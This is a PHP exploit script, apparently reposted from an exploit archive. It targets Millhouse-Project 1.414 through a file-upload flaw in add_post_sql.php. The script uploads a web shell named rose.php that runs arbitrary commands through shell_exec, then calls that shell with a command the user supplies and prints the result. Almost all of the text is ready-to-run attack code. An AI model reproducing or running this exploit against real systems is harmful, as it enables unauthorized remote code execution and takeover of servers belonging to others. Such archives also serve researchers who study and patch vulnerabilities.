Share
## https://sploitus.com/exploit?id=PACKETSTORM:172305
<?php  
/*  
Exploit Title: thrsrossi Millhouse-Project 1.414 Remote Code Execution  
Date: 12/05/2023  
Exploit Author: Chokri Hammedi  
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project  
Software Link: https://github.com/thrsrossi/Millhouse-Project.git  
Version: 1.414  
Tested on: Debian  
CVE: N/A  
*/  
  
  
$options = getopt('u:c:');  
  
if(!isset($options['u'], $options['c']))  
die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi  
\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n  
\033[0m\n  
\n");  
  
$target = $options['u'];  
  
$command = $options['c'];  
  
$url = $target . '/includes/add_post_sql.php';  
  
  
$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8  
Content-Disposition: form-data; name="title"  
  
helloworld  
------WebKitFormBoundaryzlHN0BEvvaJsDgh8  
Content-Disposition: form-data; name="description"  
  
<p>sdsdsds</p>  
------WebKitFormBoundaryzlHN0BEvvaJsDgh8  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundaryzlHN0BEvvaJsDgh8  
Content-Disposition: form-data; name="category"  
  
1  
------WebKitFormBoundaryzlHN0BEvvaJsDgh8  
Content-Disposition: form-data; name="image"; filename="rose.php"  
Content-Type: application/x-php  
  
<?php  
$shell = shell_exec("' . $command . '");  
echo $shell;  
?>  
  
------WebKitFormBoundaryzlHN0BEvvaJsDgh8--  
';  
  
$headers = array(  
'Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',  
'Cookie: PHPSESSID=rose1337',  
);  
  
$ch = curl_init($url);  
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_HEADER, true);  
  
$response = curl_exec($ch);  
curl_close($ch);  
  
// execute command  
  
$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);  
$ch = curl_init($shell);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
$exec_shell = curl_exec($ch);  
curl_close($ch);  
echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";  
  
?>